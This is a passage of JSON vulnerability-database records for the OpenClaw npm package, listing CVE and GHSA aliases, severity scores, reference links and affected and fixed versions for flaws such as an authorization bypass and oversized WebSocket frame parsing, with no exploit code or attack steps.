"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35657", "reference_id": "CVE-2026-35657", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35657" }, { "reference_url": "https://github.com/advisories/GHSA-5jvj-hxmh-6h6j", "reference_id": "GHSA-5jvj-hxmh-6h6j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5jvj-hxmh-6h6j" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route", "reference_id": "openclaw-authorization-bypass-in-http-session-history-route", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:28:43Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/113407?format=api", "purl": "pkg:npm/openclaw@2026.3.25", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.25" }, { "url": "http://public2.vulnerablecode.io/api/packages/998171?format=api", "purl": "pkg:npm/openclaw@2026.3.28-beta.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28-beta.1" } ], "aliases": [ "CVE-2026-35657", "GHSA-5jvj-hxmh-6h6j" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9uyu-y9qv-u7e1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89099?format=api", "vulnerability_id": "VCID-9xgq-vtg2-jucq", "summary": "## Impact\n\nOpenClaw `node.pair.approve` placed in `operator.write` scope instead of `operator.pairing` allows unprivileged pairing approval.\n\nThe pairing approval method accepted operator.write instead of the narrower pairing scope and admin requirement for exec-capable nodes.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42426", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12799", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12838", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12833", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42426" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-67mf-f936-ppxf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42426", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42426" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-node-pair-approve-via-operator-write-scope", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:25:43Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-improper-authorization-in-node-pair-approve-via-operator-write-scope" }, { "reference_url": "https://github.com/advisories/GHSA-67mf-f936-ppxf", "reference_id": "GHSA-67mf-f936-ppxf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-67mf-f936-ppxf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42426", "GHSA-67mf-f936-ppxf" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "7.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9xgq-vtg2-jucq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90304?format=api", "vulnerability_id": "VCID-9xrt-mv81-3yc8", "summary": "OpenClaw: Voice-call still parses large WebSocket frames before start validation (Incomplete fix for CVE-2026-32062)\n## Summary\nIncomplete fix for CVE-2026-32062: voice-call still parses large WebSocket frames before start validation\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses oversized pre-start voice-call WebSocket frames before start validation, and the unreleased maxPayload fix confirms the shipped resource-consumption bug remains open.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `9abcfdadf591bf266d85fbdfe14ae833e557a110` — 2026-03-31T19:47:10+09:00\n\nOpenClaw thanks @Kazamayc for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41400", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00164", "scoring_system": "epss", "scoring_elements": "0.37267", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00164", "scoring_system": "epss", "scoring_elements": "0.37242", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00164", "scoring_system": "epss", "scoring_elements": "0.37274", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41400" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/9abcfdadf591bf266d85fbdfe14ae833e557a110" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2w79-r9g8-wmcr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41400", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41400" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:52:26Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-oversized-websocket-frames-in-voice-call" }, { "reference_url": "https://github.com/advisories/GHSA-2w79-r9g8-wmcr", "reference_id": 